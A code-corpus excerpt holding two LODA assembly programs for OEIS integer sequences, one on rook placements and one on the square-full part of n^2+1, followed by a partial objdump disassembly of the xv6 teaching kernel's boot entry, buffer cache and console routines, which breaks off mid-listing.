; A179064: Number of non-attacking placements of 9 rooks on an n X n board. ; 0,0,0,0,0,0,0,0,362880,36288000,1097712000,17563392000,185513328000,1454424491520,9090153072000,47491411968000,214453407168000,857813628672000,3096707199505920,10237048593408000,31350961317312000,89786185074432000,242331081144768000,620367567730606080,1514569257154800000,3542729473483200000,7971141315337200000,17311287510316800000,36396981990441072000,74279555082532800000,147484819079161200000,285490462640947200000,539755405930540800000,998331598809128263680,1809106817368612608000,3216189897544200192000,5616025471604604672000,9642735768129666048000,16296223448139135621120,27132109799191068672000,44540113840273619568000,72147622418955615168000,115398749007481775472000,182377124962028340664320,284964257753169282288000,440456076994672170432000,673800189806946554352000,1020667743139516674048000,1531639532048737208993280,2277869619346723987200000,3358695510159200164800000,4911797003499446860800000,7126672408486542475200000,10262408268220621164288000,14670975903292712203200000,20827605447137141452800000,29370177993814484626800000,41150053632316504075200000,57297334677637500274308480,79304269450017301417728000,109131355999820406277872000,149341734589999872457152000,203270694303055381955568000,275238599624897469252894720,370817309762497387625472000,497162265720356608339968000,663424914036468732115968000,881263086039825170153472000,1165470431287668787527966720,1534750097637618129235968000,2012662654055991932746752000,2628783874685377218281472000,3420114567431243944390128000,4432792277219761382125524480,5724163581120559636009200000,7365285997895378137132800000,9443940458806595366578800000,12068249055110129428747200000,15371008643457615870369648000,19514869136704769206579200000,24698506251141973527076800000,31163962475638699567660800000,39205357467983017041931200000,49179200407837896577398497280,61516572532311080812275648000,76737488691005692981546752000,95467792883336964197456832000,118458995047037566214565888000,146611515588685087810246312320,181001871097142083716353472000,222914410255120998699453168000,273878294149999148351309568000,335710511069067833629602672000,410565823641008079993241413120,500994667166048934821390448000,610010153600516182231990272000,741165487503519726061569792000,898643270039616645511339008000,1087358356747936141068720199680,1313076146296263906616012800000 add $0,1 bin $0,9 pow $0,2 mul $0,362880
programs/oeis/059/A059592.asm
neoneye/loda
22
86498
; A059592: Square-full part of n^2+1. ; 1,1,1,1,1,1,1,5,1,1,1,1,1,1,1,1,1,1,5,1,1,1,1,1,1,1,1,1,1,1,1,1,5,1,1,1,1,1,17,1,1,29,1,5,1,1,1,1,1,1,1,1,1,1,1,1,1,5,1,1,1,1,1,1,1,1,1,1,5,1,13,1,1,1,1,1,1,1,1,1,1,1,5,1,1,1,1,1,1,1,1,1,1,5,1,1,1,1,1,13 pow $0,2 seq $0,57918 ; Number of pairs of numbers (a,b) each less than n where (a,b,n) is in geometric progression. seq $0,7947 ; Largest squarefree number dividing n: the squarefree kernel of n, rad(n), radical of n.
kernel.asm
tanya217/xv6
0
171797
<reponame>tanya217/xv6 kernel: file format elf32-i386 Disassembly of section .text: 80100000 <multiboot_header>: 80100000: 02 b0 ad 1b 00 00 add 0x1bad(%eax),%dh 80100006: 00 00 add %al,(%eax) 80100008: fe 4f 52 decb 0x52(%edi) 8010000b: e4 .byte 0xe4 8010000c <entry>: # Entering xv6 on boot processor, with paging off. .globl entry entry: # Turn on page size extension for 4Mbyte pages movl %cr4, %eax 8010000c: 0f 20 e0 mov %cr4,%eax orl $(CR4_PSE), %eax 8010000f: 83 c8 10 or $0x10,%eax movl %eax, %cr4 80100012: 0f 22 e0 mov %eax,%cr4 # Set page directory movl $(V2P_WO(entrypgdir)), %eax 80100015: b8 00 90 10 00 mov $0x109000,%eax movl %eax, %cr3 8010001a: 0f 22 d8 mov %eax,%cr3 # Turn on paging. movl %cr0, %eax 8010001d: 0f 20 c0 mov %cr0,%eax orl $(CR0_PG|CR0_WP), %eax 80100020: 0d 00 00 01 80 or $0x80010000,%eax movl %eax, %cr0 80100025: 0f 22 c0 mov %eax,%cr0 # Set up the stack pointer. movl $(stack + KSTACKSIZE), %esp 80100028: bc d0 b5 10 80 mov $0x8010b5d0,%esp # Jump to main(), and switch to executing at # high addresses. The indirect call is needed because # the assembler produces a PC-relative instruction # for a direct jump. mov $main, %eax 8010002d: b8 60 2e 10 80 mov $0x80102e60,%eax jmp *%eax 80100032: ff e0 jmp *%eax 80100034: 66 90 xchg %ax,%ax 80100036: 66 90 xchg %ax,%ax 80100038: 66 90 xchg %ax,%ax 8010003a: 66 90 xchg %ax,%ax 8010003c: 66 90 xchg %ax,%ax 8010003e: 66 90 xchg %ax,%ax 80100040 <binit>: struct buf head; } bcache; void binit(void) { 80100040: 55 push %ebp 80100041: 89 e5 mov %esp,%ebp 80100043: 53 push %ebx //PAGEBREAK! // Create linked list of buffers bcache.head.prev = &bcache.head; bcache.head.next = &bcache.head; for(b = bcache.buf; b < bcache.buf+NBUF; b++){ 80100044: bb 14 b6 10 80 mov $0x8010b614,%ebx struct buf head; } bcache; void binit(void) { 80100049: 83 ec 0c sub $0xc,%esp struct buf *b; initlock(&bcache.lock, "bcache"); 8010004c: 68 a0 71 10 80 push $0x801071a0 80100051: 68 e0 b5 10 80 push $0x8010b5e0 80100056: e8 c5 43 00 00 call 80104420 <initlock> //PAGEBREAK! // Create linked list of buffers bcache.head.prev = &bcache.head; 8010005b: c7 05 2c fd 10 80 dc movl $0x8010fcdc,0x8010fd2c 80100062: fc 10 80 bcache.head.next = &bcache.head; 80100065: c7 05 30 fd 10 80 dc movl $0x8010fcdc,0x8010fd30 8010006c: fc 10 80 8010006f: 83 c4 10 add $0x10,%esp 80100072: ba dc fc 10 80 mov $0x8010fcdc,%edx 80100077: eb 09 jmp 80100082 <binit+0x42> 80100079: 8d b4 26 00 00 00 00 lea 0x0(%esi,%eiz,1),%esi 80100080: 89 c3 mov %eax,%ebx for(b = bcache.buf; b < bcache.buf+NBUF; b++){ b->next = bcache.head.next; b->prev = &bcache.head; initsleeplock(&b->lock, "buffer"); 80100082: 8d 43 0c lea 0xc(%ebx),%eax 80100085: 83 ec 08 sub $0x8,%esp //PAGEBREAK! // Create linked list of buffers bcache.head.prev = &bcache.head; bcache.head.next = &bcache.head; for(b = bcache.buf; b < bcache.buf+NBUF; b++){ b->next = bcache.head.next; 80100088: 89 53 54 mov %edx,0x54(%ebx) b->prev = &bcache.head; 8010008b: c7 43 50 dc fc 10 80 movl $0x8010fcdc,0x50(%ebx) initsleeplock(&b->lock, "buffer"); 80100092: 68 a7 71 10 80 push $0x801071a7 80100097: 50 push %eax 80100098: e8 73 42 00 00 call 80104310 <initsleeplock> bcache.head.next->prev = b; 8010009d: a1 30 fd 10 80 mov 0x8010fd30,%eax //PAGEBREAK! // Create linked list of buffers bcache.head.prev = &bcache.head; bcache.head.next = &bcache.head; for(b = bcache.buf; b < bcache.buf+NBUF; b++){ 801000a2: 83 c4 10 add $0x10,%esp 801000a5: 89 da mov %ebx,%edx b->next = bcache.head.next; b->prev = &bcache.head; initsleeplock(&b->lock, "buffer"); bcache.head.next->prev = b; 801000a7: 89 58 50 mov %ebx,0x50(%eax) //PAGEBREAK! // Create linked list of buffers bcache.head.prev = &bcache.head; bcache.head.next = &bcache.head; for(b = bcache.buf; b < bcache.buf+NBUF; b++){ 801000aa: 8d 83 5c 02 00 00 lea 0x25c(%ebx),%eax b->next = bcache.head.next; b->prev = &bcache.head; initsleeplock(&b->lock, "buffer"); bcache.head.next->prev = b; bcache.head.next = b; 801000b0: 89 1d 30 fd 10 80 mov %ebx,0x8010fd30 //PAGEBREAK! // Create linked list of buffers bcache.head.prev = &bcache.head; bcache.head.next = &bcache.head; for(b = bcache.buf; b < bcache.buf+NBUF; b++){ 801000b6: 3d dc fc 10 80 cmp $0x8010fcdc,%eax 801000bb: 75 c3 jne 80100080 <binit+0x40> b->prev = &bcache.head; initsleeplock(&b->lock, "buffer"); bcache.head.next->prev = b; bcache.head.next = b; } } 801000bd: 8b 5d fc mov -0x4(%ebp),%ebx 801000c0: c9 leave 801000c1: c3 ret 801000c2: 8d b4 26 00 00 00 00 lea 0x0(%esi,%eiz,1),%esi 801000c9: 8d bc 27 00 00 00 00 lea 0x0(%edi,%eiz,1),%edi 801000d0 <bread>: } // Return a locked buf with the contents of the indicated block. struct buf* bread(uint dev, uint blockno) { 801000d0: 55 push %ebp 801000d1: 89 e5 mov %esp,%ebp 801000d3: 57 push %edi 801000d4: 56 push %esi 801000d5: 53 push %ebx 801000d6: 83 ec 18 sub $0x18,%esp 801000d9: 8b 75 08 mov 0x8(%ebp),%esi 801000dc: 8b 7d 0c mov 0xc(%ebp),%edi static struct buf* bget(uint dev, uint blockno) { struct buf *b; acquire(&bcache.lock); 801000df: 68 e0 b5 10 80 push $0x8010b5e0 801000e4: e8 37 44 00 00 call 80104520 <acquire> // Is the block already cached? for(b = bcache.head.next; b != &bcache.head; b = b->next){ 801000e9: 8b 1d 30 fd 10 80 mov 0x8010fd30,%ebx 801000ef: 83 c4 10 add $0x10,%esp 801000f2: 81 fb dc fc 10 80 cmp $0x8010fcdc,%ebx 801000f8: 75 11 jne 8010010b <bread+0x3b> 801000fa: eb 24 jmp 80100120 <bread+0x50> 801000fc: 8d 74 26 00 lea 0x0(%esi,%eiz,1),%esi 80100100: 8b 5b 54 mov 0x54(%ebx),%ebx 80100103: 81 fb dc fc 10 80 cmp $0x8010fcdc,%ebx 80100109: 74 15 je 80100120 <bread+0x50> if(b->dev == dev && b->blockno == blockno){ 8010010b: 3b 73 04 cmp 0x4(%ebx),%esi 8010010e: 75 f0 jne 80100100 <bread+0x30> 80100110: 3b 7b 08 cmp 0x8(%ebx),%edi 80100113: 75 eb jne 80100100 <bread+0x30> b->refcnt++; 80100115: 83 43 4c 01 addl $0x1,0x4c(%ebx) 80100119: eb 3f jmp 8010015a <bread+0x8a> 8010011b: 90 nop 8010011c: 8d 74 26 00 lea 0x0(%esi,%eiz,1),%esi } // Not cached; recycle an unused buffer. // Even if refcnt==0, B_DIRTY indicates a buffer is in use // because log.c has modified it but not yet committed it. for(b = bcache.head.prev; b != &bcache.head; b = b->prev){ 80100120: 8b 1d 2c fd 10 80 mov 0x8010fd2c,%ebx 80100126: 81 fb dc fc 10 80 cmp $0x8010fcdc,%ebx 8010012c: 75 0d jne 8010013b <bread+0x6b> 8010012e: eb 60 jmp 80100190 <bread+0xc0> 80100130: 8b 5b 50 mov 0x50(%ebx),%ebx 80100133: 81 fb dc fc 10 80 cmp $0x8010fcdc,%ebx 80100139: 74 55 je 80100190 <bread+0xc0> if(b->refcnt == 0 && (b->flags & B_DIRTY) == 0) { 8010013b: 8b 43 4c mov 0x4c(%ebx),%eax 8010013e: 85 c0 test %eax,%eax 80100140: 75 ee jne 80100130 <bread+0x60> 80100142: f6 03 04 testb $0x4,(%ebx) 80100145: 75 e9 jne 80100130 <bread+0x60> b->dev = dev; 80100147: 89 73 04 mov %esi,0x4(%ebx) b->blockno = blockno; 8010014a: 89 7b 08 mov %edi,0x8(%ebx) b->flags = 0; 8010014d: c7 03 00 00 00 00 movl $0x0,(%ebx) b->refcnt = 1; 80100153: c7 43 4c 01 00 00 00 movl $0x1,0x4c(%ebx) release(&bcache.lock); 8010015a: 83 ec 0c sub $0xc,%esp 8010015d: 68 e0 b5 10 80 push $0x8010b5e0 80100162: e8 d9 44 00 00 call 80104640 <release> acquiresleep(&b->lock); 80100167: 8d 43 0c lea 0xc(%ebx),%eax 8010016a: 89 04 24 mov %eax,(%esp) 8010016d: e8 de 41 00 00 call 80104350 <acquiresleep> 80100172: 83 c4 10 add $0x10,%esp bread(uint dev, uint blockno) { struct buf *b; b = bget(dev, blockno); if((b->flags & B_VALID) == 0) { 80100175: f6 03 02 testb $0x2,(%ebx) 80100178: 75 0c jne 80100186 <bread+0xb6> iderw(b); 8010017a: 83 ec 0c sub $0xc,%esp 8010017d: 53 push %ebx 8010017e: e8 6d 1f 00 00 call 801020f0 <iderw> 80100183: 83 c4 10 add $0x10,%esp } return b; } 80100186: 8d 65 f4 lea -0xc(%ebp),%esp 80100189: 89 d8 mov %ebx,%eax 8010018b: 5b pop %ebx 8010018c: 5e pop %esi 8010018d: 5f pop %edi 8010018e: 5d pop %ebp 8010018f: c3 ret release(&bcache.lock); acquiresleep(&b->lock); return b; } } panic("bget: no buffers"); 80100190: 83 ec 0c sub $0xc,%esp 80100193: 68 ae 71 10 80 push $0x801071ae 80100198: e8 d3 01 00 00 call 80100370 <panic> 8010019d: 8d 76 00 lea 0x0(%esi),%esi 801001a0 <bwrite>: } // Write b's contents to disk. Must be locked. void bwrite(struct buf *b) { 801001a0: 55 push %ebp 801001a1: 89 e5 mov %esp,%ebp 801001a3: 53 push %ebx 801001a4: 83 ec 10 sub $0x10,%esp 801001a7: 8b 5d 08 mov 0x8(%ebp),%ebx if(!holdingsleep(&b->lock)) 801001aa: 8d 43 0c lea 0xc(%ebx),%eax 801001ad: 50 push %eax 801001ae: e8 3d 42 00 00 call 801043f0 <holdingsleep> 801001b3: 83 c4 10 add $0x10,%esp 801001b6: 85 c0 test %eax,%eax 801001b8: 74 0f je 801001c9 <bwrite+0x29> panic("bwrite"); b->flags |= B_DIRTY; 801001ba: 83 0b 04 orl $0x4,(%ebx) iderw(b); 801001bd: 89 5d 08 mov %ebx,0x8(%ebp) } 801001c0: 8b 5d fc mov -0x4(%ebp),%ebx 801001c3: c9 leave bwrite(struct buf *b) { if(!holdingsleep(&b->lock)) panic("bwrite"); b->flags |= B_DIRTY; iderw(b); 801001c4: e9 27 1f 00 00 jmp 801020f0 <iderw> // Write b's contents to disk. Must be locked. void bwrite(struct buf *b) { if(!holdingsleep(&b->lock)) panic("bwrite"); 801001c9: 83 ec 0c sub $0xc,%esp 801001cc: 68 bf 71 10 80 push $0x801071bf 801001d1: e8 9a 01 00 00 call 80100370 <panic> 801001d6: 8d 76 00 lea 0x0(%esi),%esi 801001d9: 8d bc 27 00 00 00 00 lea 0x0(%edi,%eiz,1),%edi 801001e0 <brelse>: // Release a locked buffer. // Move to the head of the MRU list. void brelse(struct buf *b) { 801001e0: 55 push %ebp 801001e1: 89 e5 mov %esp,%ebp 801001e3: 56 push %esi 801001e4: 53 push %ebx 801001e5: 8b 5d 08 mov 0x8(%ebp),%ebx if(!holdingsleep(&b->lock)) 801001e8: 83 ec 0c sub $0xc,%esp 801001eb: 8d 73 0c lea 0xc(%ebx),%esi 801001ee: 56 push %esi 801001ef: e8 fc 41 00 00 call 801043f0 <holdingsleep> 801001f4: 83 c4 10 add $0x10,%esp 801001f7: 85 c0 test %eax,%eax 801001f9: 74 66 je 80100261 <brelse+0x81> panic("brelse"); releasesleep(&b->lock); 801001fb: 83 ec 0c sub $0xc,%esp 801001fe: 56 push %esi 801001ff: e8 ac 41 00 00 call 801043b0 <releasesleep> acquire(&bcache.lock); 80100204: c7 04 24 e0 b5 10 80 movl $0x8010b5e0,(%esp) 8010020b: e8 10 43 00 00 call 80104520 <acquire> b->refcnt--; 80100210: 8b 43 4c mov 0x4c(%ebx),%eax if (b->refcnt == 0) { 80100213: 83 c4 10 add $0x10,%esp panic("brelse"); releasesleep(&b->lock); acquire(&bcache.lock); b->refcnt--; 80100216: 83 e8 01 sub $0x1,%eax if (b->refcnt == 0) { 80100219: 85 c0 test %eax,%eax panic("brelse"); releasesleep(&b->lock); acquire(&bcache.lock); b->refcnt--; 8010021b: 89 43 4c mov %eax,0x4c(%ebx) if (b->refcnt == 0) { 8010021e: 75 2f jne 8010024f <brelse+0x6f> // no one is waiting for it. b->next->prev = b->prev; 80100220: 8b 43 54 mov 0x54(%ebx),%eax 80100223: 8b 53 50 mov 0x50(%ebx),%edx 80100226: 89 50 50 mov %edx,0x50(%eax) b->prev->next = b->next; 80100229: 8b 43 50 mov 0x50(%ebx),%eax 8010022c: 8b 53 54 mov 0x54(%ebx),%edx 8010022f: 89 50 54 mov %edx,0x54(%eax) b->next = bcache.head.next; 80100232: a1 30 fd 10 80 mov 0x8010fd30,%eax b->prev = &bcache.head; 80100237: c7 43 50 dc fc 10 80 movl $0x8010fcdc,0x50(%ebx) b->refcnt--; if (b->refcnt == 0) { // no one is waiting for it. b->next->prev = b->prev; b->prev->next = b->next; b->next = bcache.head.next; 8010023e: 89 43 54 mov %eax,0x54(%ebx) b->prev = &bcache.head; bcache.head.next->prev = b; 80100241: a1 30 fd 10 80 mov 0x8010fd30,%eax 80100246: 89 58 50 mov %ebx,0x50(%eax) bcache.head.next = b; 80100249: 89 1d 30 fd 10 80 mov %ebx,0x8010fd30 } release(&bcache.lock); 8010024f: c7 45 08 e0 b5 10 80 movl $0x8010b5e0,0x8(%ebp) } 80100256: 8d 65 f8 lea -0x8(%ebp),%esp 80100259: 5b pop %ebx 8010025a: 5e pop %esi 8010025b: 5d pop %ebp b->prev = &bcache.head; bcache.head.next->prev = b; bcache.head.next = b; } release(&bcache.lock); 8010025c: e9 df 43 00 00 jmp 80104640 <release> // Move to the head of the MRU list. void brelse(struct buf *b) { if(!holdingsleep(&b->lock)) panic("brelse"); 80100261: 83 ec 0c sub $0xc,%esp 80100264: 68 c6 71 10 80 push $0x801071c6 80100269: e8 02 01 00 00 call 80100370 <panic> 8010026e: 66 90 xchg %ax,%ax 80100270 <consoleread>: } } int consoleread(struct inode *ip, char *dst, int n) { 80100270: 55 push %ebp 80100271: 89 e5 mov %esp,%ebp 80100273: 57 push %edi 80100274: 56 push %esi 80100275: 53 push %ebx 80100276: 83 ec 28 sub $0x28,%esp 80100279: 8b 7d 08 mov 0x8(%ebp),%edi 8010027c: 8b 75 0c mov 0xc(%ebp),%esi uint target; int c; iunlock(ip); 8010027f: 57 push %edi 80100280: e8 cb 14 00 00 call 80101750 <iunlock> target = n; acquire(&cons.lock); 80100285: c7 04 24 20 a5 10 80 movl $0x8010a520,(%esp) 8010028c: e8 8f 42 00 00 call 80104520 <acquire> while(n > 0){ 80100291: 8b 5d 10 mov 0x10(%ebp),%ebx 80100294: 83 c4 10 add $0x10,%esp 80100297: 31 c0 xor %eax,%eax 80100299: 85 db test %ebx,%ebx 8010029b: 0f 8e 9a 00 00 00 jle 8010033b <consoleread+0xcb> while(input.r == input.w){ 801002a1: a1 c0 ff 10 80 mov 0x8010ffc0,%eax 801002a6: 3b 05 c4 ff 10 80 cmp 0x8010ffc4,%eax 801002ac: 74 24 je 801002d2 <consoleread+0x62> 801002ae: eb 58 jmp 80100308 <consoleread+0x98> if(myproc()->killed){ release(&cons.lock); ilock(ip); return -1; } sleep(&input.r, &cons.lock); 801002b0: 83 ec 08 sub $0x8,%esp 801002b3: 68 20 a5 10 80 push $0x8010a520 801002b8: 68 c0 ff 10 80 push $0x8010ffc0 801002bd: e8 6e 3a 00 00 call 80103d30 <sleep> iunlock(ip); target = n; acquire(&cons.lock); while(n > 0){ while(input.r == input.w){ 801002c2: a1 c0 ff 10 80 mov 0x8010ffc0,%eax 801002c7: 83 c4 10 add $0x10,%esp 801002ca: 3b 05 c4 ff 10 80 cmp 0x8010ffc4,%eax 801002d0: 75 36 jne 80100308 <consoleread+0x98> if(myproc()->killed){ 801002d2: e8 a9 34 00 00 call 80103780 <myproc> 801002d7: 8b 40 24 mov 0x24(%eax),%eax 801002da: 85 c0 test %eax,%eax 801002dc: 74 d2 je 801002b0 <consoleread+0x40> release(&cons.lock); 801002de: 83 ec 0c sub $0xc,%esp 801002e1: 68 20 a5 10 80 push $0x8010a520 801002e6: e8 55 43 00 00 call 80104640 <release> ilock(ip); 801002eb: 89 3c 24 mov %edi,(%esp) 801002ee: e8 7d 13 00 00 call 80101670 <ilock> return -1; 801002f3: 83 c4 10 add $0x10,%esp 801002f6: b8 ff ff ff ff mov $0xffffffff,%eax } release(&cons.lock); ilock(ip); return target - n; } 801002fb: 8d 65 f4 lea -0xc(%ebp),%esp 801002fe: 5b pop %ebx 801002ff: 5e pop %esi 80100300: 5f pop %edi 80100301: 5d pop %ebp 80100302: c3 ret 80100303: 90 nop 80100304: 8d 74 26 00 lea 0x0(%esi,%eiz,1),%esi ilock(ip); return -1; } sleep(&input.r, &cons.lock); } c = input.buf[input.r++ % INPUT_BUF]; 80100308: 8d 50 01 lea 0x1(%eax),%edx 8010030b: 89 15 c0 ff 10 80 mov %edx,0x8010ffc0 80100311: 89 c2 mov %eax,%edx 80100313: 83 e2 7f and $0x7f,%edx 80100316: 0f be 92 40 ff 10 80 movsbl -0x7fef00c0(%edx),%edx if(c == C('D')){ // EOF 8010031d: 83 fa 04 cmp $0x4,%edx 80100320: 74 39 je 8010035b <consoleread+0xeb> // caller gets a 0-byte result. input.r--; } break; } *dst++ = c; 80100322: 83 c6 01 add $0x1,%esi --n; 80100325: 83 eb 01 sub $0x1,%ebx if(c == '\n') 80100328: 83 fa 0a cmp $0xa,%edx // caller gets a 0-byte result. input.r--; } break; } *dst++ = c; 8010032b: 88 56 ff mov %dl,-0x1(%esi) --n; if(c == '\n') 8010032e: 74 35 je 80100365 <consoleread+0xf5> int c; iunlock(ip); target = n; acquire(&cons.lock); while(n > 0){ 80100330: 85 db test %ebx,%ebx 80100332: 0f 85 69 ff ff ff jne 801002a1 <consoleread+0x31> 80100338: 8b 45 10 mov 0x10(%ebp),%eax *dst++ = c; --n; if(c == '\n') break; } release(&cons.lock); 8010033b: 83 ec 0c sub $0xc,%esp 8010033e: 89 45 e4 mov %eax,-0x1c(%ebp) 80100341: 68 20 a5 10 80 push $0x8010a520 80100346: e8 f5 42 00 00 call 80104640 <release> ilock(ip); 8010034b: 89 3c 24 mov %edi,(%esp) 8010034e: e8 1d 13 00 00 call 80101670 <ilock> return target - n; 80100353: 83 c4 10 add $0x10,%esp 80100356: 8b 45 e4 mov -0x1c(%ebp),%eax 80100359: eb a0 jmp 801002fb <consoleread+0x8b> } sleep(&input.r, &cons.lock); } c = input.buf[input.r++ % INPUT_BUF]; if(c == C('D')){ // EOF if(n < target){ 8010035b: 39 5d 10 cmp %ebx,0x10(%ebp) 8010035e: 76 05 jbe 80100365 <consoleread+0xf5> // Save ^D for next time, to make sure // caller gets a 0-byte result. input.r--; 80100360: a3 c0 ff 10 80 mov %eax,0x8010ffc0 80100365: 8b 45 10 mov 0x10(%ebp),%eax 80100368: 29 d8 sub %ebx,%eax 8010036a: eb cf jmp 8010033b <consoleread+0xcb> 8010036c: 8d 74 26 00 lea 0x0(%esi,%eiz,1),%esi 80100370 <panic>: release(&cons.lock); } void panic(char *s) { 80100370: 55 push %ebp 80100371: 89 e5 mov %esp,%ebp 80100373: 56 push %esi 80100374: 53 push %ebx 80100375: 83 ec 30 sub $0x30,%esp } static inline void cli(void) { asm volatile("cli"); 80100378: fa cli int i; uint pcs[10]; cli(); cons.locking = 0; 80100379: c7 05 54 a5 10 80 00 movl $0x0,0x8010a554 80100380: 00 00 00 // use lapiccpunum so that we can call panic from mycpu() cprintf("lapicid %d: panic: ", lapicid()); cprintf(s); cprintf("\n"); getcallerpcs(&s, pcs); 80100383: 8d 5d d0 lea -0x30(%ebp),%ebx 80100386: 8d 75 f8 lea -0x8(%ebp),%esi uint pcs[10]; cli(); cons.locking = 0; // use lapiccpunum so that we can call panic from mycpu() cprintf("lapicid %d: panic: ", lapicid()); 80100389: e8 62 23 00 00 call 801026f0 <lapicid> 8010038e: 83 ec 08 sub $0x8,%esp 80100391: 50 push %eax 80100392: 68 cd 71 10 80 push $0x801071cd 80100397: e8 c4 02 00 00 call 80100660 <cprintf> cprintf(s); 8010039c: 58 pop %eax 8010039d: ff 75 08 pushl 0x8(%ebp) 801003a0: e8 bb 02 00 00 call 80100660 <cprintf> cprintf("\n"); 801003a5: c7 04 24 1b 7c 10 80 movl $0x80107c1b,(%esp) 801003ac: e8 af 02 00 00 call 80100660 <cprintf> getcallerpcs(&s, pcs); 801003b1: 5a pop %edx 801003b2: 8d 45 08 lea 0x8(%ebp),%eax 801003b5: 59 pop %ecx 801003b6: 53 push %ebx 801003b7: 50 push %eax 801003b8: e8 83 40 00 00 call 80104440 <getcallerpcs> 801003bd: 83 c4 10 add $0x10,%esp for(i=0; i<10; i++) cprintf(" %p", pcs[i]); 801003c0: 83 ec 08 sub $0x8,%esp 801003c3: ff 33 pushl (%ebx) 801003c5: 83 c3 04 add $0x4,%ebx 801003c8: 68 e1 71 10 80 push $0x801071e1 801003cd: e8 8e 02 00 00 call 80100660 <cprintf> // use lapiccpunum so that we can call panic from mycpu() cprintf("lapicid %d: panic: ", lapicid()); cprintf(s); cprintf("\n"); getcallerpcs(&s, pcs); for(i=0; i<10; i++) 801003d2: 83 c4 10 add $0x10,%esp 801003d5: 39 f3 cmp %esi,%ebx 801003d7: 75 e7 jne 801003c0 <panic+0x50> cprintf(" %p", pcs[i]); panicked = 1; // freeze other CPU 801003d9: c7 05 58 a5 10 80 01 movl $0x1,0x8010a558 801003e0: 00 00 00 801003e3: eb fe jmp 801003e3 <panic+0x73> 801003e5: 8d 74 26 00 lea 0x0(%esi,%eiz,1),%esi 801003e9: 8d bc 27 00 00 00 00 lea 0x0(%edi,%eiz,1),%edi 801003f0 <consputc>: } void consputc(int c) { if(panicked){ 801003f0: 8b 15 58 a5 10 80 mov 0x8010a558,%edx 801003f6: 85 d2 test %edx,%edx 801003f8: 74 06 je 80100400 <consputc+0x10> 801003fa: fa cli 801003fb: eb fe jmp 801003fb <consputc+0xb> 801003fd: 8d 76 00 lea 0x0(%esi),%esi crt[pos] = ' ' | 0x0700; } void consputc(int c) { 80100400: 55 push %ebp 80100401: 89 e5 mov %esp,%ebp 80100403: 57 push %edi 80100404: 56 push %esi 80100405: 53 push %ebx 80100406: 89 c3 mov %eax,%ebx 80100408: 83 ec 0c sub $0xc,%esp cli(); for(;;) ; } if(c == BACKSPACE){ 8010040b: 3d 00 01 00 00 cmp $0x100,%eax 80100410: 0f 84 b8 00 00 00 je 801004ce <consputc+0xde> uartputc('\b'); uartputc(' '); uartputc('\b'); } else uartputc(c); 80100416: 83 ec 0c sub $0xc,%esp 80100419: 50 push %eax 8010041a: e8 f1 58 00 00 call 80105d10 <uartputc> 8010041f: 83 c4 10 add $0x10,%esp } static inline void outb(ushort port, uchar data) { asm volatile("out %0,%1" : : "a" (data), "d" (port)); 80100422: bf d4 03 00 00 mov $0x3d4,%edi 80100427: b8 0e 00 00 00 mov $0xe,%eax 8010042c: 89 fa mov %edi,%edx 8010042e: ee out %al,(%dx) static inline uchar inb(ushort port) { uchar data; asm volatile("in %1,%0" : "=a" (data) : "d" (port)); 8010042f: be d5 03 00 00 mov $0x3d5,%esi 80100434: 89 f2 mov %esi,%edx 80100436: ec in (%dx),%al { int pos; // Cursor position: col + 80*row. outb(CRTPORT, 14); pos = inb(CRTPORT+1) << 8; 80100437: 0f b6 c0 movzbl %al,%eax } static inline void outb(ushort port, uchar data) { asm volatile("out %0,%1" : : "a" (data), "d" (port)); 8010043a: 89 fa mov %edi,%edx 8010043c: c1 e0 08 shl $0x8,%eax 8010043f: 89 c1 mov %eax,%ecx 80100441: b8 0f 00 00 00 mov $0xf,%eax 80100446: ee out %al,(%dx) static inline uchar inb(ushort port) { uchar data; asm volatile("in %1,%0" : "=a" (data) : "d" (port)); 80100447: 89 f2 mov %esi,%edx 80100449: ec in (%dx),%al outb(CRTPORT, 15); pos |= inb(CRTPORT+1); 8010044a: 0f b6 c0 movzbl %al,%eax 8010044d: 09 c8 or %ecx,%eax if(c == '\n') 8010044f: 83 fb 0a cmp $0xa,%ebx 80100452: 0f 84 0b 01 00 00 je 80100563 <consputc+0x173> pos += 80 - pos%80; else if(c == BACKSPACE){ 80100458: 81 fb 00 01 00 00 cmp $0x100,%ebx 8010045e: 0f 84 e6 00 00 00 je 8010054a <consputc+0x15a> if(pos > 0) --pos; } else crt[pos++] = (c&0xff) | 0x0700; // black on white 80100464: 0f b6 d3 movzbl %bl,%edx 80100467: 8d 78 01 lea 0x1(%eax),%edi 8010046a: 80 ce 07 or $0x7,%dh 8010046d: 66 89 94 00 00 80 0b mov %dx,-0x7ff48000(%eax,%eax,1) 80100474: 80 if(pos < 0 || pos > 25*80) 80100475: 81 ff d0 07 00 00 cmp $0x7d0,%edi 8010047b: 0f 8f bc 00 00 00 jg 8010053d <consputc+0x14d> panic("pos under/overflow"); if((pos/80) >= 24){ // Scroll up. 80100481: 81 ff 7f 07 00 00 cmp $0x77f,%edi 80100487: 7f 6f jg 801004f8 <consputc+0x108> 80100489: 89 f8 mov %edi,%eax 8010048b: 8d 8c 3f 00 80 0b 80 lea -0x7ff48000(%edi,%edi,1),%ecx 80100492: 89 fb mov %edi,%ebx 80100494: c1 e8 08 shr $0x8,%eax 80100497: 89 c6 mov %eax,%esi } static inline void outb(ushort port, uchar data) { asm volatile("out %0,%1" : : "a" (data), "d" (port)); 80100499: bf d4 03 00 00 mov $0x3d4,%edi 8010049e: b8 0e 00 00 00 mov $0xe,%eax 801004a3: 89 fa mov %edi,%edx 801004a5: ee out %al,(%dx) 801004a6: ba d5 03 00 00 mov $0x3d5,%edx 801004ab: 89 f0 mov %esi,%eax 801004ad: ee out %al,(%dx) 801004ae: b8 0f 00 00 00 mov $0xf,%eax 801004b3: 89 fa mov %edi,%edx 801004b5: ee out %al,(%dx) 801004b6: ba d5 03 00 00 mov $0x3d5,%edx 801004bb: 89 d8 mov %ebx,%eax 801004bd: ee out %al,(%dx) outb(CRTPORT, 14); outb(CRTPORT+1, pos>>8); outb(CRTPORT, 15); outb(CRTPORT+1, pos); crt[pos] = ' ' | 0x0700; 801004be: b8 20 07 00 00 mov $0x720,%eax 801004c3: 66 89 01 mov %ax,(%ecx) if(c == BACKSPACE){ uartputc('\b'); uartputc(' '); uartputc('\b'); } else uartputc(c); cgaputc(c); } 801004c6: 8d 65 f4 lea -0xc(%ebp),%esp 801004c9: 5b pop %ebx 801004ca: 5e pop %esi 801004cb: 5f pop %edi 801004cc: 5d pop %ebp 801004cd: c3 ret for(;;) ; } if(c == BACKSPACE){ uartputc('\b'); uartputc(' '); uartputc('\b'); 801004ce: 83 ec 0c sub $0xc,%esp 801004d1: 6a 08 push $0x8 801004d3: e8 38 58 00 00 call 80105d10 <uartputc> 801004d8: c7 